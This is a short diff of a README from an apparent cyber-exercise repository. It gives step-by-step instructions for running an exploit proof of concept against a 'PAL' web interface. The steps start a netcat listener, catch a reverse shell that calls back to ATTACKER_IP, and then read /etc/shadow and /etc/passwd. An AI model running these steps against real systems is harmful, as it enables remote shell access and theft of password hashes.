Infinit3i/Cyber-Yankee-2025/README.md

     run command: `nc -lvnp 63842`
 3. run python:
     `python Poc.py https://<TARGET_PAL_WEB_INTERFACE_IP> <ATTACKER_IP> <ATTACKER_PORT>` # Random high port chosen in script from above
-4. once exploit is through, look at initial listener and wait for callback to catch. once callback catches perform; `whoami`, `ifconfig` run command:
+4. once exploit is through, look at initial listener and wait for callback to catch. once callback catches perform; run command:
+    `whoami` # detect who we are
-    `cat /etc/shadow` # grab the users on the machine `cat /etc/passwd` # grab what shell permissions every user has
+    `cat /etc/shadow` # grab the users on the machine `cat /etc/passwd` # grab what shell permissions every user has `uname -a` # detect what machine we are running